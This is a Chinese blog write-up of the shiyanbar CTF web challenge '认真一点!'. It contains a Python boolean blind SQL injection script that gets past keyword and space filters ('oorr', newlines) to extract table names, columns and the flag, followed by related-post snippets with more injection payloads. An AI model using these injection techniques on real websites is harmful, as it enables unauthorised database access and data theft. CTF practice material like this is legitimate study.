[CTF]认真一点!

最新推荐文章于 2021-11-27 14:28:57 发布
原创 最新推荐文章于 2021-11-27 14:28:57 发布 · 455 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

类型:web
网址:http://www.shiyanbar.com/ctf/2009
攻击:sql注入
一句话总结:or 空格等特殊字符被过滤,使用oorr,()等代替

writeup

import requests

# 暴力猜解当前数据库的长度
# str1 = 'You are in'
# url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
# for i in range(1,30):
    # key = {'id':"0'oorr(length(database())=%s)oorr'0"%i}
    # r = requests.post(url, data=key).text
    # print(i)
    # if str1 in r:
        # print("the lenghth of database is %s"%i)
        # break
        
# 暴力猜解当前数据库的名称 ctf_sql_bool_blind
# guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
# str1 = 'You are in'
# url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
# database = ''
# for i in range(1,19):
    # for j in guess:
        # key = {'id':"0'oorr((mid((database())from(%s)foorr(1)))='%s')oorr'0"%(i,j)}
        # r = requests.post(url, data=key).text
        # print(key)
        # if str1 in r:
            # database += j
            # print(j)
            # break
# print(database)

# 暴力猜解数据表的长度 11
# guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
# str1 = 'You are in'
# url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
# i = 1
# while True:
    # flag = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='')oorr'0"%i
    # flag = flag.replace(' ', chr(0x0a))
    # key = {'id':flag}
    # r = requests.post(url, data=key).text
    # print(key)
    # if str1 in r:
        # print('the lenght of tables is %s'%i)
        # break
    # i += 1
    
# 暴力破解数据表名称 fiag@users-
# guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
# str1 = 'You are in'
# url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
# tables = ''
# for i in range(1,12):
    # for j in guess:
        # flag = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='%s')oorr'0"%(i,j)
        # flag = flag.replace(' ', chr(0x0a))
        # key = {'id':flag}
        # r = requests.post(url, data=key).text
        # print(key)
        # if str1 in r:
            # tables += j
            # print(j)
            # break
# print(tables)

# 暴力破解数据表的列名 fl$4g
# guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
# str1 = 'You are in'
# url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
# columns = ''
# for i in range(1,6):
    # for j in guess:        
        # flag = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0"%(i, j)    
        # flag = flag.replace(' ', chr(0x0a))
        # key = {'id':flag}       
        # r = requests.post(url, data=key).text
        # print(key)
        # if str1 in r:
            # columns += j
            # print(j)
            # break
            
# print(columns)

# 暴力猜解数据表字段长度 14
# guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
# str1 = 'You are in'
# url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
# i = 1
# while True:
    # flag = "0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='')oorr'0"%i
    # flag = flag.replace(' ', chr(0x0a))
    # key = {'id':flag}       
    # r = requests.post(url, data=key).text
    # print(key)
    # if str1 in r:
        # print('the length of data is %s'%i)
        # break
    # i += 1

# 暴力猜解flag   flag{haha~you-win!}
guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
data = ''
for i in range(1,20):
    for j in guess:        
        flag = "0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='%s')oorr'0"%(i, j)    
        flag = flag.replace(' ', chr(0x0a))
        key = {'id':flag}       
        r = requests.post(url, data=key).text
        print(key)
        if str1 in r:
            data += j
            print(j)
            break
            
print(data)

FLAG

flag{haha~you win!}

[CTF]认真一点! rzyd.py
06-26
类型:web 网址:http://www.shiyanbar.com/ctf/2009 攻击:sql注入 一句话总结:or 空格等特殊字符被过滤,使用oorr,()等代替 博文:https://blog.youkuaiyun.com/alex_bean/article/details/93757976
实验吧web-难-认真一点!(布尔盲注之mid(),py脚本)
Sea_Sand息禅
01-11 773
也可用bp进行爆破,这里用py脚本。 打看网页输入1,显示You are in,输入2,显示You are not in,是个布尔注入。 然后看看过滤了什么。 sql注入没有过滤:--+、or sql注入过滤:union select、and、order by、空格 虽然or没有被当做sql注入处理,但是构造id=1'/**/or/**/1'='1--+时仍然是返回,You are n...
第一届“百度杯”信息安全攻防总决赛
dfdhxb995397的博客
03-15 603
第一届“百度杯”信息安全攻防总决赛(3月15-3月26) 比赛通道:第一届“百度杯”信息安全攻防总决赛比赛通道 百度杯已经陪伴大家度过了七个月, 共计23场比赛 覆盖了i春秋30w+用户、国内全部CTF人群 共计发放奖金10w+元 也有过5次升级 现在,第一届百度杯即将迎来总决赛! 先让我们来回顾一下,百度杯是什...
实验吧CTF(认真一点!)
欢迎光临
12-13 1949
输入1 输入2或者其他内容 看来只有输入1猜显示you are in 输入其他都是you are not in  输入; 过滤了: union 空格 逗号 % and ^ sleep substr | # ; 发现or 没有过滤 先看看可以用哪些来代替空格 经过测试  /**/  可以代替空格 于是构造 id=1'/**/or/**/1='1 按理来...
认真一点!-实验吧
Xi4or0uji
06-05 3128
这个题其实是个布尔盲注题,怎么说,正常是you are in,报错是you are not in,触发waf是sql injection detected然后fuzz一下,图我就不贴了,做的时候忘了截下图结果大概是过滤了and,空格,逗号,union,+这里有个坑,fuzz的时候or是可以用的,但是尝试id = 1'/**/or/**/'1'='1的时候报you are not in,不应该啊试了...
CTF——实验吧(web总结1.1)
热门推荐
加载中...
10-19 1万+
地址:http://www.shiyanbar.com/ctf/practice 一、你能跨过去吗题目:?,你是在问我吗???你是在怀疑我的能力吗??? 解题链接: http://ctf1.shiyanbar.com/basic/xss/ 思路: 1、发现所给字串中有%+数字,怀疑使用escape加密了url,使用站长工具http://tool.chinaz.com/Tools/Escape.
实验吧 认真一点
xingyyn78的博客
03-30 7224
        本实验是输入id获取结果,查看页面源码,没有什么注释信息。随便输入个1,结果为You are in ...............,其他的id显示为You are not in ...............        使用Burp suite进行模糊测试,结果为or部分sql命令都可以使用。        但是使用or命令注入失败,但是从模糊测试来看是没有屏蔽or关键字,应该...
关于CTF学习总结
m0_37496212的博客
02-26 3082
# -*-coding:utf-8-*- import requests import time payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.{}-' #不区分大小写的 flag = "" print("Start") for i in range(33): for payload in payloads: s
写一下自已对ctf的了解,以便日后自已需要
m0_50987622的博客
11-07 6303
11.7 本人ctf小白,参加比赛基本处于摸鱼状态,也没有系统了解过ctf以及做过相关的实践和练习,但是,对这一块比较感兴趣,所以,只能说,在学习中,就跟我当初学makefile一样,做下记录,写点自已觉得对自已有用的东西,大概这样。 ctf总共分为五部分,misc杂项,crypto解密加密,pwn攻破设备、系统,reverse逆向渗透,web网络安全。500pt的题都很难。 首先,建立在你对前后端足够了解的基础上。 web安全就是黑服务器,pwn就是黑设备黑系统,至于怎么黑,仁者见仁智者见智,取决
CTF-REVERSE练习之API断点
ChuMeng1999的博客
11-27 751
目录预备知识一、相关实验二、输入表与API动态调用三、API断点四、MessageBox实验目的实验环境实验步骤一实验步骤二实验步骤三 预备知识 一、相关实验 本实验要求您已经认真学习和完成了《CTF REVERSE练习之逆向初探》、《CTF REVERSE练习之API定位》。 二、输入表与API动态调用 在逆向分析中经常会遇到输入表这个概念,输入表中保存的是在程序中调用的但定义在其他DLL中的函数信息以及对应的DLL信息。我们在程序中直接调用Windows API的时候,这些API都可以在程序的输入表中可
实验吧 认真一点
Assassin
01-31 3165
真的很久很久没碰过这个玩意了,真是不会了,而且这个题目本身就不是很容易,搞得我也是满肚子邪火,很气。这个题目主要难在它吧过滤和ban结合到了一起了。我们还是先看题目,首先拿到题目看到输入id=0和输入id=1结果不一样,这就奠定了盲注的基础了 然后我们肯定要fuzz一下,结果如下 禁了union、and、substr,sleep,堵住了时间盲注、联合查询注入的路子,而且还把逗号禁止了…这
实验吧CTF题库>flag.xls
cointreau00的博客
09-24 3828
实验吧CTF题库>flag.xls 题目地址:http://www.shiyanbar.com/ctf/1919 首先我们进入题目地址后可以看到解题链接是让我们下载一个.xls的文件,而且出题人给的提示也是“flag就在excel表格里,仔细找找!” 把文件下载之后先尝试用EXCEL打开,打开之后弹出来一个提示框,需要我们输入密码。但是我们没有得到和密码有关的任何提示,所以我们换一个方式打开...
ctf题库--简单的sql注入③
miko2018的博客
08-21 6145
<题目> mysql报错注入 格式:flag{} 解题链接: http://ctf5.shiyanbar.com/web/index_3.php <解答> 1.打开题目链接,在查询中输入1,发现地址栏变化。 2.认为这里可能(看题目其实知道是一定)存在一个sql注入。 3.使用工具sqlmap进行注入(以该地址栏id值为例)。 查看当前数据库: Sqlmap -u "...
CTF题目整理
安全汪
08-23 1万+
最近在整理一些CTF题目,遇到很多很有意思的东西,记录下来 0x01:栅栏加密 栅栏加密法是一种比较简单快捷的加密方法。栅栏加密法就是把要被加密的文件按照一上一下的写法写出来,再把第二行的文字排列到第一行的后面。相应的,破译方法就是把文字从中间分开,分成2行,然后插入。栅栏加密法一般配合其他方法进行加密。 例: 加密information 分行 i f r a i n n o m t o 合并 if
CTF-web Xman-2018 crypto 古典密码和简单入门rsa题目
iamsongyu的博客
12-08 4619
Rotator  这是一道凯撒密码的题目,题目里提示先五移位,在八移位就可以得到 完成,这里使用的软件米斯特安全工具或者使用在线的工具也可以   单表替换密码 Lw! Gyzvecy ke WvyVKT! W'zz by reso dsbdkwksky tzjq teo kly ujr. Teo keujr, gy joy dksurwmq bjdwv vorakeqo...
ctf题库-Just Click
miko2018的博客
08-21 3042
<题目> 拿到答案需要正确地点击按钮 格式:simCTF{ } 解题链接: http://ctf5.shiyanbar.com/re/rev4.exe <解答> 根据连接可知这是一个exe文件。打开连接下载文件。 ※拿到题目,随便点击按钮,发现没有任何反应。 多次点击后,程序退出。 因此可分析只有按照正确顺序点击才能得到正确答案。 ※我们再次打开程序,...
CTF解题笔记(1)
CODING...
01-09 1万+
因缺思汀的绕过 解题路径:http://ctf5.shiyanbar.com/web/pcat/index.php 打开后是一个登录框类似的东西,查看页面源码可以看到有source:source.txt的字样 打开连接:http://ctf5.shiyanbar.com/web/pcat/source.txt 可以看到登录的php逻辑: <?php error_rep
实验吧 简单的sql注入
windseraph2的博客
05-19 2835
http://ctf5.shiyanbar.com/423/web/  知识点:当过滤空格时,通常用()或/**/代替空格 payload 1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1
CTF实验吧加了料的报错注入
深耕网络安全领域,聚焦护网行动(HW)、渗透测试、等级保护(等保)、CTF 竞赛四大核心方向,提供技术干货、实战经验与行业洞察。
08-05 473
实验吧地址 http://ctf5.shiyanbar.com/web/baocuo/index.php F12审查元素发现源码中的提示是这样一整句的查询 基本确定此题为一个SQL注入 /# = union select等这几个都是报错‘Sql injection detected’说明都被过滤了 利用报错函数updatexml尝试发现是在password处进行了过滤 但是Username处没...
ctf Stuck in reverse!
最新发布
01-18
### CTF竞赛中的逆向工程技术解决方案 在处理CTF比赛中的逆向工程挑战时,理解二进制文件的工作原理至关重要。通常情况下,这类题目会提供一个可执行文件,参赛者需要通过分析该文件来找出其内部逻辑或隐藏的信息。 #### 使用静态分析工具 为了更好地理解和破解给定的程序,可以采用多种方法和技术。其中一种常用的方式是利用静态反汇编器和调试器来进行深入研究[^1]。IDA Pro、Ghidra 和 Radare2 是三个广泛使用的工具选项,它们能够帮助解析目标代码并揭示潜在的秘密路径或漏洞所在之处。 #### 动态调试技巧 除了静态分析外,在某些场景下还需要借助动态调试手段进一步探索未知领域。这涉及到设置断点、单步跟踪指令流以及监控内存变化等方面的操作。gdb (GNU Debugger) 或者 WinDbg 就是非常适合此类工作的强大软件之一[^2]。 #### Python辅助脚本编写 对于一些复杂的逆向任务来说,手动操作可能效率低下甚至难以完成;此时可以通过编写自动化程度较高的Python脚本来简化流程。例如,使用`pwntools`库可以帮助快速构建网络连接并与远程服务器交互,而`angr`则是一个专为解决约束满足问题设计的强大框架,可用于自动寻找特定条件下的输入数据[^3]。 ```python from pwn import * # 连接到远端服务 conn = remote('challenge.example.com', 9999) # 发送payload到服务端 conn.sendline(b'your_payload_here') # 接收响应消息 response = conn.recvall() print(response.decode()) ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值